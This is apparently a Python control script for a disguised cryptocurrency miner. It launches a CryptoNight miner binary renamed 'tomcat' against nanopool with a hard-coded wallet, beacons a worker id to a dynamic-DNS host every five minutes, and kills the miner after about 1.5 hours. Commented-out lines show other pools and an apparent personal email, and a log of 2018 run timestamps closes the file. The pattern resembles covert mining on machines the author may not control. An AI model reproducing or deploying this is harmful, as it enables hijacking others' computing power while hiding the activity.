import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:23:06.775685
#2018-02-17 17:11:07.028023
#2018-02-17 18:59:01.517216
#2018-02-17 20:46:07.398729
#2018-02-17 22:33:07.212648
#2018-02-18 00:17:07.127808
#2018-02-18 02:08:07.535185
#2018-02-18 03:56:01.516956
#2018-02-18 05:44:05.236782
#2018-02-18 07:36:04.721822
#2018-02-18 09:23:05.982220
#2018-02-18 11:08:03.267680
#2018-02-18 12:55:06.997685
#2018-02-18 14:42:05.360367
#2018-02-18 16:31:06.028182
#2018-02-18 18:20:08.164178
#2018-02-18 20:07:01.813031
#2018-02-18 21:53:03.474639
#2018-02-18 23:42:02.060440
#2018-02-19 01:28:01.284404
#2018-02-19 03:16:03.485726
#2018-02-19 05:01:05.456815
#2018-02-19 06:45:05.753011
#2018-02-19 08:36:05.914290
#2018-02-19 10:25:01.974035
#2018-02-19 12:13:01.520713
#2018-02-19 14:00:07.927088
#2018-02-19 15:49:02.138779
#2018-02-19 17:37:01.549227
#2018-02-19 19:25:01.966960
#2018-02-19 21:11:05.560140
#2018-02-19 22:59:03.533766
#2018-02-20 00:42:04.342532
#2018-02-20 02:32:04.281987
#2018-02-20 04:22:05.174399
#2018-02-20 06:05:04.131560
#2018-02-20 07:49:07.170484
#2018-02-20 09:34:08.091611
#2018-02-20 11:18:08.650720
#2018-02-20 13:05:06.783296
#2018-02-20 14:49:08.768875
#2018-02-20 16:32:07.508936
#2018-02-20 18:19:07.258663
#2018-02-20 20:10:05.670590
#2018-02-20 21:57:06.475462
#2018-02-20 23:39:03.616383
#2018-02-21 01:23:05.781452
#2018-02-21 03:15:01.770535
#2018-02-21 05:02:04.226984
#2018-02-21 06:50:01.466050
#2018-02-21 08:36:05.467219
#2018-02-21 10:21:07.090650
#2018-02-21 12:08:06.248874
#2018-02-21 13:57:07.307606
#2018-02-21 15:41:06.301721
#2018-02-21 17:33:05.920691
#2018-02-21 19:19:09.049988
#2018-02-21 21:07:01.501028
#2018-02-21 22:53:01.712875
#2018-02-22 00:41:06.943490
#2018-02-22 02:27:07.248953
#2018-02-22 04:14:01.583883
#2018-02-22 05:58:07.082989
#2018-02-22 07:44:08.113679
#2018-02-22 09:33:07.865588
#2018-02-22 11:19:03.670591
#2018-02-22 13:04:06.132191
#2018-02-22 14:51:06.009571
#2018-02-22 16:37:08.331956
#2018-02-22 18:24:08.855724
#2018-02-22 20:14:07.138621
#2018-02-22 22:01:08.155399
#2018-02-22 23:49:01.424559
#2018-02-23 01:38:04.832616
#2018-02-23 03:24:04.071650
#2018-02-23 05:10:06.132347
#2018-02-23 06:55:07.679923
#2018-02-23 08:46:01.351473
#2018-02-23 11:04:01.672763
#2018-02-23 12:59:07.521621
#2018-02-23 16:18:02.010339
#2018-02-23 18:56:06.437822
#2018-02-23 22:01:05.853991
#2018-02-23 23:50:08.496502
#2018-02-24 01:40:06.273286
#2018-02-24 03:28:02.123780
#2018-02-24 05:14:08.044102
#2018-02-24 07:02:04.466108
#2018-02-24 08:38:01.353917
#2018-02-24 10:07:05.887180
#2018-02-24 11:52:06.223520
#2018-02-24 13:20:07.676419
#2018-02-24 14:53:05.774917
#2018-02-24 16:26:01.539405
#2018-02-24 18:01:07.077562
#2018-02-24 19:32:03.628550
#2018-02-24 21:09:06.626454
#2018-02-24 23:12:04.731970
#2018-02-25 01:32:07.134612
#2018-02-25 05:01:06.247170
#2018-02-25 09:49:01.653169